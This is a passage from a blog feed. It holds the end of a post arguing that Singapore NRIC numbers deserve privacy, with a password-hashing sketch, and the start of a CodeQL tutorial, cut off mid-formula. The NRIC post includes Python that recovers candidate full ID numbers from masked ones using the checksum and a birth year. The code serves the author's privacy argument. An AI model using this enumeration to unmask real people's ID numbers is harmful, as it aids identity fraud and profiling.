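    """Return the check letter for a 7-digit S- or T-series number."""
    if prefix not in ("S", "T") or len(digits) != 7 or not digits.isdigit():
        raise ValueError("expected prefix S or T and exactly 7 digits")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, digits))
    if prefix == "T":
        total += 4  # T-series numbers add a fixed offset before the modulo
    return LETTERS[total % 11]


def candidates(prefix: str, birth_year: str, last3: str, letter: str) -> list[str]:
    """Enumerate full numbers consistent with a masked value and a birth year.

    Assumes the mask hides everything except the last three digits and the
    letter, and that the first two digits are the two-digit birth year.
    """
    found = []
    for middle in range(100):  # only two digits remain unknown
        digits = f"{birth_year}{middle:02d}{last3}"
        if checksum_letter(prefix, digits) == letter:
            found.append(prefix + digits + letter)
    return found


matches = candidates("S", "12", "567", "D")
print(len(matches), "of 100 candidates pass the checksum")
```

<p>With only two digits unknown, the checksum leaves 9 of the 100 possibilities standing in this example, which is the sense in which masking adds little once the birth year is known.</p>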
<blockquote>
<p>The ministry said it recognises that some Singaporeans have "long treated" the NRIC number as private and confidential information, and will need time to adjust to this "new way of thinking".</p>
<p>In 2025, MDDI and the Personal Data Protection Commission (PDPC) will be carrying out public education about the purpose of the NRIC number and "how it should be used freely as a personal identifier".</p>
</blockquote>
<p>Perhaps the timing just wasn't right, and there is a perfectly reasonable world where the NRIC number is public and everyone is fine with it. But this probably
doesn't have to be either/or. Most web services use email addresses as unique account identifiers, and one probably wouldn't consider their email address
to be top-secret information. Yet it would likely be a bad idea to make the email addresses of all registered users public. So if the NRIC number is to be
used as a unique identifier, maybe it should be treated with at least the same level of care.</p>
<h2>Scalability</h2>
<p>When we think about threat models, it's often tempting to think about the worst-case scenario. But the reality is that most people are not going to be
targeted by a sophisticated attacker who is willing to invest significant time and resources — and those who are probably either have the means to protect
themselves or have bigger problems to worry about. The real danger is in the low-hanging fruit that can be exploited at scale.</p>
<p>For instance, think about the chip-and-pin terminal relay attack. It's a conceptually obvious decades-old attack that involves intercepting the communication
between a chip card and a terminal, and relaying it to another terminal to make a transaction for a higher amount. But it's not used in practice because it's
not scalable: you need to be physically close to the victim, and you need to have a way to relay the communication in real-time. So while it's a cool attack,
no one's bothered fixing it because it's not a real threat.</p>
<figure class="mx-auto"><img alt="A relay attack" loading="lazy" width="956" height="424" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1920&amp;q=75"><figcaption class="text-center">A relay attack</figcaption></figure>
<p>On the other hand, attacks like the no-PIN attack, which only requires a stolen card, were a much bigger problem, so the industry had to change the protocol
entirely.</p>
<p>The reason it would be a bad idea to make the email addresses of all registered users public is that it enables a stupidly simple attack at scale: you can
now send phishing emails to everyone who has ever signed up for the service, and you'll probably get a few people to click on the link. You can also spray
passwords from a data breach against all the email addresses you have, and you'll probably get a few hits. So while any one individual's email address is
probably not that sensitive, making <em>all</em> email addresses easily scrapable would be really bad (and if you could dump the email addresses of all users of
a popular service, you could probably get a handsome bug bounty or, if you're less ethical, make a lot of money selling that data).</p>
<p>At the same time, for the individual, letting one person know your email address is probably not a big deal — you can just block them, right? But if you
let everyone know your email address, that's probably called an invasion of privacy. The scale at which the information is exposed matters.</p>
<p>In fact, there is probably a lot of "unique identifier" information that can be considered "not sensitive" on its own, but that you probably wouldn't be comfortable
seeing made public. Some simple examples:</p>
<ul>
<li>Your phone number uniquely identifies you among all people who have a phone number, but you probably don't want any random person — maybe a creep
you met at a bar that one time — to be able to look up your phone number and call you.</li>
<li>Your home address is unique to the people who live with you — likely your family — but you probably don't want people or unsolicited mail to show up at your door uninvited.</li>
</ul>
<p>While it's true that these examples facilitate some other kind of interaction (a phone number is used to call you, and a home address is used to send you mail) and the NRIC
number has no such direct utility, the point is that the NRIC number has become part of what most people consider to be their personal, private information. In fact, the NRIC
number itself already encodes one's birth year. And when enough of these pieces of information are put together, they can be used to paint a very detailed picture of a person's life,
which is the holy grail of scammers, stalkers, and data brokers.</p>
<p>It's fine for one website to store metadata about me, keyed with my NRIC number. But if that website, and a bunch of other websites, make my NRIC and its associated metadata public,
then I'd expect to be able to find a good profile of myself available for sale on the internet or the dark web. And that's stretching my comfort zone.</p>
<h2>Privacy vs. security</h2>
<blockquote>
<p>"Likewise, the NRIC number should not be used as passwords, just as we should not be using our names as passwords. If the NRIC number is used for authentication, it would have to be kept a secret, which would defeat its main purpose as a unique identifier," MDDI added.</p>
</blockquote>
<p>Subsequently, the PDPC also <a href="https://www.channelnewsasia.com/singapore/pdpc-nric-numbers-personal-data-protection-4807096">made a similar point</a> about authentication:</p>
<blockquote>
<p>The commission noted that it had previously taken action against organisations which used NRIC numbers for authentication and "breached their data protection obligations".</p>
<p>It said: "A person’s name and NRIC number identifies who the person is. Authentication is about proving you are who you claim to be. This requires proof of identity, for example, through a password, a security token or biometric data.</p>
<p>"As the NRIC number is not a secret, it should not be used by an organisation for authentication purposes."</p>
</blockquote>
<p>I believe that for many technical folk, this wouldn't be a controversial statement. Indeed, using NRIC numbers as "what you know" in authentication is inherently flawed.
If the intent is to make NRIC numbers public, there is much work to be done to ensure that systems we use are secure. Imagine ordering a plate of chicken rice
and getting a queue number. In the ideal case, you should not be able to just walk up to the counter and say "I'm number 42". You should have to present your queue number
or receipt. But most places don't do this, and the same is true for many systems that depend on NRIC numbers for authentication.</p>
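<p>The difference between identifying someone and authenticating them can be sketched in a few lines of Python. This is a toy, in-memory illustration under stated assumptions: the <code>ACCOUNTS</code> store, the function names, and the iteration count are hypothetical, and the identifier is the placeholder <code>S1234567D</code>. The point is only that the identifier selects the record, while a separate secret proves the claim.</p>

```python
import hashlib
import hmac
import secrets

# Hypothetical in-memory account store keyed by a public identifier.
ACCOUNTS = {}
ITERATIONS = 100_000  # illustrative work factor, not a tuned recommendation


def _derive(secret: str, salt: bytes) -> bytes:
    """Derive a key from the secret so the secret itself is never stored."""
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, ITERATIONS)


def register(identifier: str, secret: str) -> None:
    """Store a salted hash of the secret under the (public) identifier."""
    salt = secrets.token_bytes(16)
    ACCOUNTS[identifier] = (salt, _derive(secret, salt))


def authenticate(identifier: str, secret: str) -> bool:
    """Identification is the lookup; authentication is the secret check."""
    record = ACCOUNTS.get(identifier)
    if record is None:
        return False
    salt, expected = record
    return hmac.compare_digest(_derive(secret, salt), expected)


register("S1234567D", "correct horse battery staple")
print(authenticate("S1234567D", "correct horse battery staple"))  # True
print(authenticate("S1234567D", "S1234567D"))  # False: the identifier is not a secret
```

<p>A system built this way loses nothing if the identifier becomes public, which is the property the quoted statements are asking for.</p>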
<p>But this seems to be conflating the issues of privacy and security. While there is much to be said about the current flawed implementations of NRIC-based authentication,
the fact that we want to use NRIC numbers as usernames or account identifiers doesn't change many people's expectations of privacy.</p>
<p>Going by this reasoning, should identifiers like passport numbers, biometric data stored on my phone, and even credit card numbers be public too? After all, all of these
require at least one second factor of authentication to be useful (a convincing face, access to my physical phone, CVV number).</p>
<p>I think the distinction between privacy and security is important. Privacy is about controlling who has access to your information, while security is about ensuring that
only the right people have access to your information. The two are related, but they are not the same. One would generally consider Google to be secure (I don't lose sleep
over the idea that someone might hack into my Google account), but we all know that Google's advertising business runs on a lot of our data. So while I have strong security controls
over my Google account, I have very little privacy control over it.</p>
<p>The main contention then is about whether we should consider NRIC numbers to be personally identifiable information (PII) that we should expect reasonable privacy over.
For me at least, the answer is yes. At the very least, the correlation between my NRIC number and other information about me, in the hands of unsavoury characters, would
create inherent risk that I would not be comfortable with.</p>
<p>This is echoed in the <a href="https://www.pdpc.gov.sg/-/media/files/pdpc/pdf-files/advisory-guidelines/advisory-guidelines-for-nric-numbers---310818.pdf">PDPC's guidelines on NRIC numbers</a>:</p>
<blockquote>
<p>As the NRIC number is a permanent and irreplaceable identifier which can potentially
be used to unlock large amounts of information relating to the individual, the
collection, use and disclosure of an individual’s NRIC number is of special concern.
Indiscriminate or negligent handling of NRIC numbers increases the risk of unintended
disclosure with the result that NRIC numbers may be obtained and used for illegal
activities such as identity theft and fraud.</p>
</blockquote>
<p>It does not matter how secure our systems are if we are not careful about what information we expose to the world. Even if all systems in our small corner of the world were
perfectly secure, the NRIC number does not stay there: having lived and worked overseas, I have had mine used by foreign governments and organizations as a form of identification, and for tax purposes as an independent
contractor. Can we be certain that all systems in all countries make the same assumptions about the sensitivity (or lack thereof) of the NRIC number, when in most other countries,
similar identifiers are considered private? One would have to expect systems to know that a Singaporean NRIC number is far less sensitive than a US Social Security Number, or UK
National Insurance Number, and implement different security controls based on that. But that's a big ask.</p>
<p>More importantly, it is impossible to patch human nature. Ever notice how banks always have a disclaimer that they will never call you to ask for your PIN? Yet, people
still fall for scams! No matter how much you try to educate people, there will always be someone who doesn't get the memo. A big part of modern security engineering is
designing systems that are secure by default — making it hard for people to make mistakes — because we've learnt as an industry that education can only go so far.</p>
<h2>Where I stand</h2>
<p>My folks are getting old. Of all things privacy-related, I lose the most sleep over the idea that they might fall for impersonation scams that have been on the rise in Singapore.</p>
<p>I know women in my life who would be deeply uncomfortable with what a highly motivated individual might do when given access to just a little bit more information about them.</p>
<p>Just because I have a secure lock on my door doesn't mean I want to risk someone bringing a lockpick to my doorstep. People used to have to pay good money for this information
on the dark web, and surely Economics 101 tells us that there is value in this information. Now it's intended to be free for all. We cybersecurity folk tend to be a paranoid bunch,
but I think the idea that we shouldn't let people know more about us than they need to should not be controversial.</p>
<p>Let me know what you think. Should the NRIC number be public?</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[An introduction to CodeQL and data flow analysis]]></title>
            <link>https://www.analogue.computer/blog/codeql-and-data-flow-analysis</link>
            <guid>https://www.analogue.computer/blog/codeql-and-data-flow-analysis</guid>
            <pubDate>Sat, 21 Sep 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>I'll be honest — when I sat through my first-year Discrete Mathematics course, there were plenty of times when I wondered if I'd ever use
any of it in the real world. I'm going to assume that a significant proportion of my audience is studying, has studied, or is about to study Computer Science,
where discrete mathematics is a core part of the foundational curriculum. If you're in that boat, you might be wondering the same thing.</p>
<p>Recently, I've worked extensively with <a href="https://codeql.github.com/">CodeQL</a> — a powerful static analysis tool developed by GitHub — to roll out code scanning
as part of CI/CD pipelines. At the core of this is the QL language, which is used to write queries that reason about code. Compared to its competitors,
CodeQL excels at taint tracking and data flow analysis, which is a fancy way of saying that it's really good at highlighting how potentially malicious or
insecure data can flow through your code and end up in a dangerous place that introduces a security vulnerability.</p>
<p>Now, do you <em>need</em> to understand the mathematics behind CodeQL to use it effectively? Not necessarily. But at its core, QL is a declarative logic programming
language, and thus it's built on a foundation of set theory and predicate logic. I like to understand the tools I use, so I wanted to write a little about
how CodeQL and data flow analysis work under the hood. This is by no means a comprehensive guide, but I hope it serves as a useful introduction for those who
are curious!</p>
<h2>An introduction to CodeQL</h2>
<p>QL is a declarative language. This means that queries are written in a way that describes the desired result, rather than the steps to achieve it. This is
in contrast to imperative languages like Python or Java, where you write code that describes the steps to achieve the desired result.</p>
<p>Here's what a typical CodeQL analysis workflow might look like:</p>
<ol>
<li>The source code is extracted into a database. This database contains a relational representation of the codebase, which includes information about the
structure of the code, the control flow, and the data flow.</li>
<li>The CodeQL engine runs QL queries against the database, similar to how one might run SQL queries against a relational database, to find patterns in the
code that match the query.</li>
<li>The results are exported into the <a href="https://sarifweb.azurewebsites.net/">SARIF</a> format, which can be consumed by CI tools or custom integrations.</li>
</ol>
<p>In this sense, CodeQL is a lot like SQL. One might even recognise the similarities in the basic syntax:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Function</span><span style="color:#F69D50"> f</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#F47067"> not</span><span style="color:#F47067"> exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">CallExpr</span><span style="color:#ADBAC7"> c | c.</span><span style="color:#DCBDFB">getCallee</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> f)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> f, </span><span style="color:#96D0FF">"This function is never called."</span></span></code></pre></figure>
<p>This query, for example, finds all functions that are never called in a JavaScript codebase. Notice the <code>exists</code> existential quantifier, which checks if
there is at least one <code>CallExpr</code> that calls the function <code>f</code>.</p>
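<p>Notice also that QL is object-oriented. <code>CallExpr::getCallee()</code> returns an <code>Expr</code>, which could be a <code>FunctionExpr</code> (which is a <code>Function</code>). Because the equality only
holds when the callee expression is itself the function, a call made through a name such as <code>foo()</code> is not matched, so this query is best read as an illustration of the syntax rather than a reliable dead-code check. Keep
in mind, too, that class objects in the traditional sense (allocating memory to hold the state of an instance of a class) don't exist in QL. Here, classes
are more like abstract data types that describe sets of existing values.</p>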
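<p>If set-builder thinking is easier to follow in a familiar language, the shape of the query above can be mimicked in Python. This is only an analogy on toy data, not how the CodeQL engine evaluates anything: the <code>Function</code> and <code>CallExpr</code> dataclasses are hypothetical stand-ins, and the toy model assumes every call is already resolved to its target function.</p>

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Function:
    name: str


@dataclass(frozen=True)
class CallExpr:
    callee: Function  # toy model: the call is already resolved to its target


# The "database": finite sets of values that already exist.
main, helper, unused = Function("main"), Function("helper"), Function("unused")
FUNCTIONS = {main, helper, unused}
CALLS = {CallExpr(main), CallExpr(helper)}

# from Function f where not exists(CallExpr c | c.getCallee() = f) select f
never_called = {
    f for f in FUNCTIONS
    if not any(c.callee == f for c in CALLS)  # any() plays the role of exists
}

print(sorted(f.name for f in never_called))  # ['unused']
```

<p>Nothing is constructed by the query itself: it only selects members of sets that were populated beforehand, which is the sense in which QL classes describe existing values.</p>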
<h2>Predicates and Binding</h2>
<p>Binding refers to the process of associating variables in a query with sets of values from the CodeQL database. A common mistake is to think of variables
in the imperative sense, where they can be assigned any value at any time. CodeQL works on relations between values, so variables are bound to <strong>finite sets</strong>
of values that already exist.</p>
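<p>One way to picture binding outside QL is with ordinary Python sets. In this hedged sketch, <code>DOMAIN</code> is a made-up stand-in for the database, a "class" is a subset of it, and a predicate is simply the set of tuples that satisfy a condition. All names and values are assumptions for illustration.</p>

```python
from itertools import product

# Toy stand-in for the database: every value a variable could be bound to.
DOMAIN = {40, 2, 21, "hello", 3.5}

# A "class" is a subset of the domain; here, the integers.
INTS = {d for d in DOMAIN if isinstance(d, int)}

# A predicate is the set of tuples that satisfy it. The variables x and y
# never take arbitrary values: they range only over the finite set INTS.
sums_to_42 = {(x, y) for x, y in product(INTS, repeat=2) if x + y == 42}

print(sorted(sums_to_42))  # [(2, 40), (21, 21), (40, 2)]
```

<p>Because the comprehension has to iterate over something finite, a condition with nothing to range over has no meaning here, which mirrors why QL variables must be bound.</p>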
<p>Let's walk through a simple example.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  x </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span><span style="color:#ADBAC7"> y </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">  x.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> y.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 42</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(x, y)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> x, y</span></span></code></pre></figure>
<p>First, consider the domain of all elements in the CodeQL database, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><msub><mi>d</mi><mn>1</mn></msub><mo separator="true">,</mo><msub><mi>d</mi><mn>2</mn></msub><mo separator="true">,</mo><mo>⋯</mo><mtext> </mtext><mo separator="true">,</mo><msub><mi>d</mi><mi>n</mi></msub><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">D=\{d_1, d_2, \cdots, d_n\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span 
class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="minner">⋯</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mspace" style="margin-right:0.1667em"></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">}</span></span></span></span> where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>n</mi></mrow><annotation encoding="application/x-tex">n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">n</span></span></span></span> is finite.</p>
<p>We have introduced a predicate <code>sumsTo42</code> that takes two <code>Expr</code> objects and checks if their integer values sum to 42.</p>
<p>Let:</p>
<ul>
<li><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>E</mi><mo>⊆</mo><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><mi>e</mi><mo>∈</mo><mi>D</mi><mo>∣</mo><mi>e</mi><mtext>&nbsp;instanceof&nbsp;Expr</mtext><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">E \subseteq D = \{e \in D \mid e \text{ instanceof Expr}\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8193em;vertical-align:-0.136em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord mathnormal">e</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal">e</span><span class="mord text"><span class="mord">&nbsp;instanceof&nbsp;Expr</span></span><span class="mclose">}</span></span></span></span>.</li>
<li><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>C</mi><mo>⊆</mo><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><mi>c</mi><mo>∈</mo><mi>D</mi><mo>∣</mo><mi>c</mi><mtext>&nbsp;instanceof&nbsp;ConstantExpr</mtext><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">C \subseteq D = \{c \in D \mid c \text{ instanceof ConstantExpr}\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8193em;vertical-align:-0.136em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord mathnormal">c</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal">c</span><span class="mord text"><span class="mord">&nbsp;instanceof&nbsp;ConstantExpr</span></span><span class="mclose">}</span></span></span></span>.</li>
</ul>
<p>Then, the predicate <code>sumsTo42</code> evaluates to a set of two-tuples:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mi>P</mi><mo>=</mo><mo stretchy="false">{</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>E</mi><mo>×</mo><mi>E</mi><mo>∣</mo><mo stretchy="false">(</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>C</mi><mo>×</mo><mi>C</mi><mo stretchy="false">)</mo><mo>∧</mo><mo stretchy="false">(</mo><mi>x</mi><mo>+</mo><mi>y</mi><mo>=</mo><mn>42</mn><mo stretchy="false">)</mo><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">P = \{(x, y) \in E \times E \mid ((x, y) \in C \times C) \land (x + y = 42)\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span 
class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">((</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">(</span><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:0.625em;vertical-align:-0.1944em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span 
class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord">42</span><span class="mclose">)}</span></span></span></span></span>
<p>Now, the <code>from</code> clause lets the variables <code>x</code> and <code>y</code> each range over the set of all <code>Expr</code> objects in the database, i.e. <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>E</mi></mrow><annotation encoding="application/x-tex">E</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span></span></span></span>, so the candidate tuples are all pairs of such expressions. The <code>where</code> clause then filters these pairs to
only include those tuples that satisfy the predicate <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>P</mi></mrow><annotation encoding="application/x-tex">P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span></span></span></span>. The result is</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mo stretchy="false">{</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>E</mi><mo>×</mo><mi>E</mi><mo>∣</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>P</mi><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">\{(x, y) \in E \times E \mid (x, y) \in P\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" 